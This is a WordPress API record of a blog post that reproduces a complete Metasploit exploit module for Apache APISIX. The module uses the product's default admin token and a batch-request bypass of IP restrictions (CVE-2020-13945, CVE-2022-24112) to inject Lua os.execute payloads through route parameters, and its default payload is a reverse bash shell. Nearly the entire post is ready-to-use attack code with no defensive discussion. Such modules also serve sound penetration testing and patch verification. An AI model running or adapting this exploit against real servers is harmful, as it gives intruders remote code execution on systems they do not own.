{"id":21384,"date":"2022-03-07T19:49:05","date_gmt":"2022-03-07T16:49:05","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166228\/apache_apisix_api_default_token_rce.rb.txt"},"modified":"2022-03-08T09:08:03","modified_gmt":"2022-03-08T05:38:03","slug":"apache-apisix-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apache-apisix-remote-code-execution\/","title":{"rendered":"Apache APISIX Remote Code Execution"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n

include Msf::Exploit::Remote::HttpClient
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘APISIX Admin API default access token RCE’,
\n‘Description’ => %q{
\nApache APISIX has a default, built-in API token edd1c9f034335f136f87ad84b625c8f1 that can be used to access
\nall of the admin API, which leads to remote LUA code execution through the script parameter added in the 2.x
\nversion. This module also leverages another vulnerability to bypass the IP restriction plugin.
\n},
\n‘Author’ => [
\n‘Heyder Andrade <eu[at]heyderandrade.org>’, # module development and debugging
\n‘YuanSheng Wang <membphis[at]gmail.com>’ # discovered
\n],
\n‘License’ => MSF_LICENSE,
\n‘References’ => [
\n[‘CVE’, ‘2020-13945’],
\n[‘CVE’, ‘2022-24112’],
\n[‘URL’, ‘https:\/\/github.com\/apache\/apisix\/pull\/2244’],
\n[‘URL’, ‘https:\/\/seclists.org\/oss-sec\/2020\/q4\/187’],
\n[‘URL’, ‘https:\/\/www.openwall.com\/lists\/oss-security\/2022\/02\/11\/3’]\n],
\n‘DisclosureDate’ => ‘2020-12-07’,
\n‘Arch’ => ARCH_CMD,
\n‘Platform’ => %w[unix],
\n‘Targets’ => [
\n[
\n‘Automatic’, { ‘DefaultOptions’ => { ‘PAYLOAD’ => ‘cmd\/unix\/reverse_bash’ } }
\n]\n],
\n‘Privileged’ => false,
\n‘DefaultTarget’ => 0,
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [IOC_IN_LOGS]\n}
\n)
\n)
\nregister_options([
\nOptString.new(‘TARGETURI’, [true, ‘Path to the APISIX DocumentRoot’, ‘\/apisix’]),
\nOptString.new(‘API_KEY’, [true, ‘Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)’, ‘edd1c9f034335f136f87ad84b625c8f1’]),
\nOptString.new(‘ALLOWED_IP’, [true, ‘IP in the allowed list’, ‘127.0.0.1’])
\n])
\nend<\/p>\n

def check
\nprint_status(“Checking component version to #{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}”)
\n# batch request is the preferred method because it bypass the ip-restriction plugin
\nres = nil
\nif batch_request_enabled?<\/p>\n

pipeline = [
\n{
\nmethod: ‘GET’,
\npath: “#{target_uri.path}\/admin\/routes”
\n}
\n]\nres = batch_request(batch_body(pipeline))
\nvprint_good(‘Can perform authenticated requests through batch requests’) if res && res.code == 200<\/p>\n

pipeline = [
\n{
\nmethod: ‘GET’,
\npath: “#{target_uri.path}\/admin\/routes\/index”
\n}
\n]\nres = batch_request(batch_body(pipeline))<\/p>\n

else
\nvprint_error(‘The batch-requests plugin is not enabled’)<\/p>\n

vprint_good(‘There is direct access to the routes using the provided token’) if direct_access?<\/p>\n

res = apisix_request({
\n‘uri’ => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
\n‘method’ => ‘GET’
\n})<\/p>\n

end
\nunless res && res.headers.key?(‘Server’)
\nreturn Exploit::CheckCode::Unknown(‘Unable to determine which web server is running’)
\nend<\/p>\n

res.headers[‘Server’].match(%r{(.*)\/([\\d|.]+)$})<\/p>\n

server = Regexp.last_match(1) || nil
\nversion = Rex::Version.new(Regexp.last_match(2)) || nil<\/p>\n

if server && server.match(\/APISIX\/)
\nvprint_status(“Found an #{server} #{version} http server header”)
\nreturn Exploit::CheckCode::Appears if version > Rex::Version.new(‘2’)
\nend
\nreturn Exploit::CheckCode::Safe(‘A vulnerable version if APISIX server is not running’)
\nend<\/p>\n

def exploit
\n# batch request is the preferred method because it bypass the ip-restriction plugin
\nif batch_request_enabled?
\n@payload_uri = “\/#{Rex::Text.rand_text_alpha_lower(3)}\/#{Rex::Text.rand_text_alpha_lower(6)}”
\nfilter_func_exec
\n# trigger the payload
\napisix_request({
\n‘uri’ => normalize_uri(@payload_uri),
\n‘method’ => ‘GET’
\n})
\nelse
\nadd_route
\nend
\nhandler
\nend<\/p>\n

def cleanup
\nreturn unless @payload_uri<\/p>\n

data = {
\n‘uri’ => @payload_uri
\n}
\npipeline = [
\n{
\n‘path’ => normalize_uri(target_uri.path, ‘\/admin\/routes\/index’),
\n‘method’ => ‘DELETE’,
\n‘body’ => JSON.dump(data)
\n}
\n]\nvprint_status(“Deleting route #{@payload_uri}”)
\n# remove the route
\nres = batch_request(batch_body(pipeline))
\nvprint_error(‘Unable to delete the route’) unless res.code == 200
\nend<\/p>\n

def apisix_request(params = {})
\nparams.merge!({
\n‘ctype’ => ‘application\/json’,
\n‘headers’ => {
\n‘X-API-KEY’ => datastore[‘API_KEY’],
\n‘Accept’ => ‘*\/*’,
\n‘Accept-Encoding’ => ‘gzip, deflate’
\n}
\n})<\/p>\n

send_request_cgi(params)
\nend<\/p>\n

# Using batch request to bypass ip-restriction policies (CVE-2022-24112)
\ndef batch_request(data = nil)
\nparams = {
\n‘uri’ => normalize_uri(target_uri.path, ‘\/batch-requests’),
\n‘method’ => ‘POST’
\n}
\nparams.merge!({ ‘data’ => data }) if data<\/p>\n

apisix_request(params)
\nend<\/p>\n

def batch_body(pipeline = [])
\nheaders = {
\n‘X-Real-IP’: datastore[‘ALLOWED_IP’].to_s,
\n‘X-API-KEY’ => datastore[‘API_KEY’].to_s,
\n‘Content-Type’ => ‘application\/json’
\n}<\/p>\n

{
\n‘headers’ => headers,
\n‘timeout’ => 1500,
\n‘pipeline’ => pipeline
\n}.to_json
\nend<\/p>\n

def base_data
\n{
\n‘uri’ => Rex::Text.rand_text_alpha_lower(6),
\n‘upstream’ => {
\n‘type’ => ’roundrobin’,
\n‘nodes’ => { Faker::Internet.domain_name.to_s => 1 }
\n}
\n}
\nend<\/p>\n

def add_route
\n# This method use the script parameter to execute the payload
\nstub = “os.execute(‘PAYLOAD’);”.gsub(‘PAYLOAD’, payload.raw.to_s.gsub(‘\\”) { ‘\\\\\\”‘ })
\n# binding.pry
\ndata = base_data.merge({
\n‘script’ => stub
\n})
\nuri = normalize_uri(target_uri.path, ‘\/admin\/routes’)
\nif batch_request_enabled?
\npipeline = [
\n{
\n‘method’ => ‘POST’,
\n‘path’ => uri,
\n‘body’ => data
\n}
\n]\nbatch_request(batch_body(pipeline))
\nelse
\nparams = {
\n‘method’ => ‘POST’,
\n‘uri’ => uri,
\n‘data’ => JSON.dump(data)
\n}
\napisix_request(params)
\nend
\nend<\/p>\n

def filter_func_exec
\n# This method use the filter_func parameter to execute the payload
\nstub = “function(vars) os.execute(‘PAYLOAD’); return true end”.gsub(‘PAYLOAD’, payload.raw.to_s.gsub(‘\\”) { ‘\\\\\\”‘ })<\/p>\n

data = base_data.merge({
\n‘uri’ => @payload_uri,
\n‘name’ => Rex::Text.rand_text_alpha_lower(6),
\n‘filter_func’ => stub
\n})
\nif batch_request_enabled?
\npipeline = [
\n{
\n‘path’ => normalize_uri(target_uri.path, ‘\/admin\/routes\/index’),
\n‘method’ => ‘PUT’,
\n‘body’ => JSON.dump(data)
\n}
\n]\n# add the route
\nres = batch_request(batch_body(pipeline))
\nvprint_error(‘Unable to create route’) unless res.code == 200
\nelse
\nparams = {
\n‘method’ => ‘PUT’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/admin\/routes\/index’),
\n‘data’ => JSON.dump(data)
\n}
\napisix_request(params)
\nend
\nend<\/p>\n

def direct_access?
\nres = apisix_request({
\n‘uri’ => normalize_uri(target_uri.path, ‘\/admin\/routes’),
\n‘method’ => ‘GET’
\n})<\/p>\n

return false if [401, 403].include?(res.code) || res.body.match?(\/’ip-restriction’\/)<\/p>\n

true
\nend<\/p>\n

def batch_request_enabled?
\nres = apisix_request({
\n‘uri’ => normalize_uri(target_uri.path, ‘\/batch-requests’),
\n‘method’ => ‘POST’
\n})<\/p>\n

return false if res.code == 404<\/p>\n

true
\nend<\/p>\n

end<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘APISIX Admin API default access token RCE’, ‘Description’ => %q{ Apache APISIX has a default, built-in API token edd1c9f034335f136f87ad84b625c8f1 that can be used …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21384","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21384"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21384\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}